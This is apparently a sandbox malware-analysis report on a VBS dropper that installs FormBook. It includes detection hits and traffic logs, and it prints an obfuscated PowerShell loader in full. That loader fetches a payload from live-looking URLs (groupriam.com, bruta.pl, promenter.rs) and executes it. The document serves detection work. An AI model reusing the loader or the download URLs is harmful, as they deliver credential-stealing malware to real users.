Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdel

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-22T15:32:15.637893+020028032702Potentially Bad Traffic192.168.2.549988199.103.62.205443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 6 654398.vbsReversingLabs: Detection: 18%
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49988 version: TLS 1.2
          Source: Binary string: ystem.Core.pdb7y~X source: powershell.exe, 00000006.00000002.2657649363.000000000769A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5A source: powershell.exe, 00000006.00000002.2657649363.00000000075E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GJFjqeGumqI.exe, 0000000B.00000002.3467099503.0000000000C0E000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmdkey.pdbGCTL source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2665678628.0000000008710000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmdkey.pdb source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
          Source: Joe Sandbox ViewIP Address: 199.103.62.205 199.103.62.205
          Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49988 -> 199.103.62.205:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /Koalitioner.prx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /zkwqTJp58.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw== HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
          Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
          Source: global trafficDNS traffic detected: DNS query: www.groupriam.com
          Source: global trafficDNS traffic detected: DNS query: www.foundation-repair.biz
          Source: powershell.exe, 00000006.00000002.2657649363.00000000075B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microR
          Source: wscript.exe, 00000000.00000003.2196983936.000001B0BCAF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2198619389.000001B0BCAFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
          Source: wscript.exe, 00000000.00000003.2196983936.000001B0BCAF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2198619389.000001B0BCAFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enlV
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://groupriam.com
          Source: powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.groupriam.com
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bruta.pl/Koalitioner.prx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: cmdkey.exe, 0000000C.00000002.3466952802.00000000031A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: cmdkey.exe, 0000000C.00000003.3349544046.0000000007F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://promenter.rs/Koalitioner.prx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: cmdkey.exe, 0000000C.00000002.3468867917.0000000003FE4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3470326587.00000000064E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/$_Q
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/Koalitioner.prx
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/L_y
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.bin
          Source: msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.bin3
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binT
          Source: msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binUnwesJaebruta.pl/zkwqTJp58.binKrlgsBrdpromenter.rs/zkwqTJp58.
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binZ
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49988 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi32_6656.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221335C0 NtCreateMutant,LdrInitializeThunk,10_2_221335C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_22132C70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22134340 NtSetContextThread,10_2_22134340
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22133010 NtOpenDirectoryObject,10_2_22133010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22133090 NtSetValueKey,10_2_22133090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22134650 NtSuspendThread,10_2_22134650
